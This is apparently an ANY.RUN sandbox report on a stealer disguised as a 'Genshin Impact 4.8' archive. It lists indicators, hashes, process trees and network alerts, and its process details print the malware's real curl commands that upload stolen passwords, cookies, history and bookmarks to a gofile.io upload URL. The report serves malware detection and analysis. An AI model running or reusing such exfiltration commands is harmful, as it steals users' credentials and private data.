File name:

Genshin Impact 4.8.7z

Full analysis: https://app.any.run/tasks/65f8087c-bc91-4b86-988c-6179f4993af6
Verdict: Malicious activity
Threats:

Stealers are a group of malicious software that are intended for gaining unauthorized access to users’ information and transferring it to the attacker. The stealer malware category includes various types of programs that focus on their particular kind of data, including files, passwords, and cryptocurrency. Stealers are capable of spying on their targets by recording their keystrokes and taking screenshots. This type of malware is primarily distributed as part of phishing campaigns.

Malware Trends Tracker     >>>
Analysis date: July 21, 2024, 14:39:04
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
python
evasion
discordgrabber
generic
stealer
discord
Indicators:
MIME: application/x-7z-compressed
File info: 7-zip archive data, version 0.4
MD5:

43EDB22BB3495BBF4680ACF4620CAEB7

SHA1:

E3FB8844636DCFB2821357D45998F891B8CF95A3

SHA256:

0C18D44124EEBC77609EBF7E42A4565513BAE68518A857AD3FD3C94353281651

SSDEEP:

98304:exayF+apZLLoIeEwbqxlE5dGrXav6fGJaMPQMdgT/pVDc4BOceN2uuTFO9H/VEQO:oLZ8ne9mzTgieT4k4DxuN+SqP8

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Drops the executable file immediately after the start

      • WinRAR.exe (PID: 6456)
      • Genhin Private.exe (PID: 3504)
      • Genhin Private.exe (PID: 7944)

    • Create files in the Startup directory

      • Genhin Private.exe (PID: 7944)

    • DISCORDGRABBER has been detected (YARA)

      • Genhin Private.exe (PID: 7944)

    • Actions looks like stealing of personal data

      • Genhin Private.exe (PID: 7944)

  • SUSPICIOUS

    • Process drops python dynamic module

      • Genhin Private.exe (PID: 3504)

    • Process drops legitimate windows executable

      • Genhin Private.exe (PID: 3504)

    • Executable content was dropped or overwritten

      • Genhin Private.exe (PID: 3504)
      • Genhin Private.exe (PID: 7944)

    • Checks for external IP

      • Genhin Private.exe (PID: 7944)

    • Starts CMD.EXE for commands execution

      • Genhin Private.exe (PID: 7944)

    • Data upload via CURL

      • curl.exe (PID: 564)
      • curl.exe (PID: 8184)
      • curl.exe (PID: 6984)
      • curl.exe (PID: 7272)
      • curl.exe (PID: 3624)
      • curl.exe (PID: 3400)
      • curl.exe (PID: 4984)

    • Loads Python modules

      • Genhin Private.exe (PID: 7944)

    • The process drops C-runtime libraries

      • Genhin Private.exe (PID: 3504)

    • Application launched itself

      • Genhin Private.exe (PID: 3504)

  • INFO

    • Create files in a temporary directory

      • Genhin Private.exe (PID: 3504)
      • Genhin Private.exe (PID: 7944)

    • Manual execution by a user

      • Genhin Private.exe (PID: 3504)
      • Taskmgr.exe (PID: 7492)
      • Taskmgr.exe (PID: 4440)

    • Executable content was dropped or overwritten

      • WinRAR.exe (PID: 6456)

    • Reads the computer name

      • Genhin Private.exe (PID: 3504)
      • curl.exe (PID: 564)
      • curl.exe (PID: 3624)
      • curl.exe (PID: 8184)
      • curl.exe (PID: 4984)
      • Genhin Private.exe (PID: 7944)

    • Checks supported languages

      • Genhin Private.exe (PID: 3504)
      • curl.exe (PID: 564)
      • curl.exe (PID: 3624)
      • curl.exe (PID: 6984)
      • curl.exe (PID: 8184)
      • curl.exe (PID: 4984)
      • curl.exe (PID: 7272)
      • curl.exe (PID: 3400)
      • Genhin Private.exe (PID: 7944)

    • Checks proxy server information

      • Genhin Private.exe (PID: 7944)

    • Creates files or folders in the user directory

      • Genhin Private.exe (PID: 7944)

    • Attempting to use instant messaging service

      • Genhin Private.exe (PID: 7944)

    • Reads security settings of Internet Explorer

      • Taskmgr.exe (PID: 4440)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.7z | 7-Zip compressed archive (v0.4) (57.1)
.7z | 7-Zip compressed archive (gen) (42.8)
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
168
Monitored processes
28
Malicious processes
2
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winrar.exe slui.exe no specs rundll32.exe no specs genhin private.exe #DISCORDGRABBER genhin private.exe cmd.exe no specs conhost.exe no specs curl.exe cmd.exe no specs conhost.exe no specs curl.exe cmd.exe no specs conhost.exe no specs curl.exe cmd.exe no specs conhost.exe no specs curl.exe no specs cmd.exe no specs conhost.exe no specs curl.exe no specs cmd.exe no specs conhost.exe no specs curl.exe no specs cmd.exe no specs conhost.exe no specs curl.exe taskmgr.exe no specs taskmgr.exe

Process information

PID
CMD
Path
Indicators
Parent process
236\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
564curl -F "file=@C:\Users\admin\AppData\Local\Temp\cspasswords.txt" https://store4.gofile.io/uploadFileC:\Windows\System32\curl.exe
cmd.exe
User:
admin
Company:
curl, https://curl.se/
Integrity Level:
MEDIUM
Description:
The curl executable
Exit code:
0
Version:
8.4.0
Modules
Images
c:\windows\system32\curl.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\ucrtbase.dll
2276\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
2860C:\WINDOWS\system32\cmd.exe /c "curl -F "file=@C:\Users\admin\AppData\Local\Temp\cshistories.txt" https://store4.gofile.io/uploadFile"C:\Windows\System32\cmd.exeGenhin Private.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
26
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
3068C:\WINDOWS\System32\slui.exe -EmbeddingC:\Windows\System32\slui.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Activation Client
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
3400curl -F "file=@C:\Users\admin\AppData\Local\Temp\csbookmarks.txt" https://store4.gofile.io/uploadFileC:\Windows\System32\curl.execmd.exe
User:
admin
Company:
curl, https://curl.se/
Integrity Level:
MEDIUM
Description:
The curl executable
Exit code:
26
Version:
8.4.0
Modules
Images
c:\windows\system32\curl.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\cryptsp.dll
3504"C:\Users\admin\Desktop\Genshin Impact 4.8\Genhin Private.exe" C:\Users\admin\Desktop\Genshin Impact 4.8\Genhin Private.exe
explorer.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
Modules
Images
c:\users\admin\desktop\genshin impact 4.8\genhin private.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
3624curl -F "file=@C:\Users\admin\AppData\Local\Temp\cscookies.txt" https://store4.gofile.io/uploadFileC:\Windows\System32\curl.exe
cmd.exe
User:
admin
Company:
curl, https://curl.se/
Integrity Level:
MEDIUM
Description:
The curl executable
Exit code:
0
Version:
8.4.0
Modules
Images
c:\windows\system32\curl.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\ucrtbase.dll
4076C:\WINDOWS\System32\rundll32.exe C:\WINDOWS\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -EmbeddingC:\Windows\System32\rundll32.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows host process (Rundll32)
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\rundll32.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\shcore.dll
c:\windows\system32\imagehlp.dll
4440"C:\WINDOWS\system32\taskmgr.exe" /4C:\Windows\System32\Taskmgr.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Task Manager
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\taskmgr.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\combase.dll
Total events
29 260
Read events
29 233
Write events
12
Delete events
15

Modification events

(PID) Process:(6456) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\Interface\Themes
Operation:writeName:ShellExtBMP
Value:
(PID) Process:(6456) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\Interface\Themes
Operation:writeName:ShellExtIcon
Value:
(PID) Process:(6456) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:writeName:1
Value:
C:\Users\admin\Desktop\GoogleChromeEnterpriseBundle64.zip
(PID) Process:(6456) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:writeName:0
Value:
C:\Users\admin\AppData\Local\Temp\Genshin Impact 4.8.7z
(PID) Process:(6456) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:name
Value:
120
(PID) Process:(6456) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:size
Value:
80
(PID) Process:(6456) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:type
Value:
120
(PID) Process:(6456) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:mtime
Value:
100
(PID) Process:(6456) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\DialogEditHistory\ExtrPath
Operation:writeName:0
Value:
C:\Users\admin\AppData\Local\Temp\Genshin Impact 4.8
(PID) Process:(6456) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\DialogEditHistory\ExtrPath
Operation:delete valueName:15
Value:
Executable files
63
Suspicious files
14
Text files
5
Unknown types
0

Dropped files

PID
Process
Filename
Type
6456WinRAR.exeC:\Users\admin\AppData\Local\Temp\Genshin Impact 4.8\Genshin Impact 4.8\res\icudtl.dat
MD5:
SHA256:
6456WinRAR.exeC:\Users\admin\AppData\Local\Temp\Genshin Impact 4.8\Genshin Impact 4.8\res\qtwebengine_devtools_resources.pak
MD5:
SHA256:
6456WinRAR.exeC:\Users\admin\Desktop\Genshin Impact 4.8\res\icudtl.dat
MD5:
SHA256:
6456WinRAR.exeC:\Users\admin\Desktop\Genshin Impact 4.8\res\qtwebengine_devtools_resources.pak
MD5:
SHA256:
6456WinRAR.exeC:\Users\admin\AppData\Local\Temp\Genshin Impact 4.8\Genshin Impact 4.8\res\qtwebengine_resources_200p.pakbinary
MD5:EF2C2645B213B195E7FADAAB3700458E
SHA256:A2EDFABF741CE6BFDDFD5F0EA3BFA7ED1BC0B013B8D5F6880E2D0CC5F3B411F5
6456WinRAR.exeC:\Users\admin\AppData\Local\Temp\Genshin Impact 4.8\Genshin Impact 4.8\instructions.txttext
MD5:ACF1FB80A86A4E64C5C1FC65C2681CC1
SHA256:3C64CCB76E6B9FFBCA937FB91F4BFD27AD37A78D80351270E51FE3E0F1B7306D
6456WinRAR.exeC:\Users\admin\Desktop\Genshin Impact 4.8\instructions.txttext
MD5:ACF1FB80A86A4E64C5C1FC65C2681CC1
SHA256:3C64CCB76E6B9FFBCA937FB91F4BFD27AD37A78D80351270E51FE3E0F1B7306D
3504Genhin Private.exeC:\Users\admin\AppData\Local\Temp\_MEI35042\Crypto\Cipher\_chacha20.pydexecutable
MD5:CB5238E2D4149636377F9A1E2AF6DC57
SHA256:A8D3BB9CD6A78EBDB4F18693E68B659080D08CB537F9630D279EC9F26772EFC7
6456WinRAR.exeC:\Users\admin\Desktop\Genshin Impact 4.8\Genhin Private.exeexecutable
MD5:20A38494DC634A640722A27D703E290E
SHA256:0D2E3B0EC3AC83AF97390F96954BB4FE26DD2685773ED22E5400FE8CCD81475B
6456WinRAR.exeC:\Users\admin\Desktop\Genshin Impact 4.8\res\qtwebengine_resources_200p.pakbinary
MD5:EF2C2645B213B195E7FADAAB3700458E
SHA256:A2EDFABF741CE6BFDDFD5F0EA3BFA7ED1BC0B013B8D5F6880E2D0CC5F3B411F5
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
49
DNS requests
22
Threats
20

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
768
lsass.exe
GET
200
23.53.40.154:80
http://r3.o.lencr.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBRI2smg%2ByvTLU%2Fw3mjS9We3NfmzxAQUFC6zF7dYVsuuUAlA5h%2BvnYsUwsYCEgPmc6m9td0DMiYku8CeCBFzPQ%3D%3D
unknown
whitelisted
3032
svchost.exe
GET
304
2.23.197.184:80
http://x1.c.lencr.org/
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
whitelisted
5620
MoUsoCoreWorker.exe
4.231.128.59:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4716
svchost.exe
40.126.32.133:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
unknown
4032
svchost.exe
239.255.255.250:1900
whitelisted
7856
svchost.exe
4.209.32.67:443
MICROSOFT-CORP-MSN-AS-BLOCK
US
unknown
4
System
192.168.100.255:138
whitelisted
2760
svchost.exe
40.113.110.67:443
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
3352
slui.exe
20.83.72.98:443
activation-v2.sls.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
7856
svchost.exe
4.209.32.198:443
licensing.mp.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
unknown
4716
svchost.exe
20.190.160.22:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 4.231.128.59
  • 51.124.78.146
whitelisted
login.live.com
  • 40.126.32.133
  • 20.190.160.22
  • 40.126.32.76
  • 40.126.32.134
  • 20.190.160.17
  • 40.126.32.136
  • 40.126.32.68
  • 40.126.32.140
whitelisted
google.com
  • 216.58.206.46
whitelisted
activation-v2.sls.microsoft.com
  • 20.83.72.98
whitelisted
licensing.mp.microsoft.com
  • 4.209.32.198
whitelisted
arc.msn.com
  • 20.223.35.26
whitelisted
www.bing.com
  • 184.86.251.10
  • 184.86.251.16
  • 184.86.251.5
  • 184.86.251.15
  • 184.86.251.7
  • 184.86.251.13
  • 184.86.251.9
  • 184.86.251.11
  • 184.86.251.4
whitelisted
fd.api.iris.microsoft.com
  • 20.223.35.26
whitelisted
slscr.update.microsoft.com
  • 13.85.23.86
whitelisted
fe3cr.delivery.mp.microsoft.com
  • 20.166.126.56
whitelisted

Threats

PID
Process
Class
Message
2168
svchost.exe
Misc activity
ET INFO Pastebin Service Domain in DNS Lookup (rentry .co)
7944
Genhin Private.exe
Misc activity
ET INFO Observed Pastebin Service Domain (rentry .co in TLS SNI)
7944
Genhin Private.exe
Misc activity
ET INFO Observed Pastebin Service Domain (rentry .co in TLS SNI)
7944
Genhin Private.exe
Misc activity
ET INFO Observed Pastebin Service Domain (rentry .co in TLS SNI)
7944
Genhin Private.exe
Misc activity
ET INFO Observed Pastebin Service Domain (rentry .co in TLS SNI)
7944
Genhin Private.exe
Misc activity
ET INFO File Sharing Related Domain in TLS SNI (gofile .io)
2168
svchost.exe
Potentially Bad Traffic
ET INFO Online File Storage Domain in DNS Lookup (gofile .io)
7944
Genhin Private.exe
Misc activity
ET INFO External IP Address Lookup Domain (ipify .org) in TLS SNI
2168
svchost.exe
Misc activity
ET INFO External IP Lookup Domain (ipify .org) in DNS Lookup
2168
svchost.exe
Misc activity
ET INFO External IP Lookup Domain in DNS Lookup (geolocation-db .com)
1 ETPRO signatures available at the full report
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
Genshin Impact 4.8.7z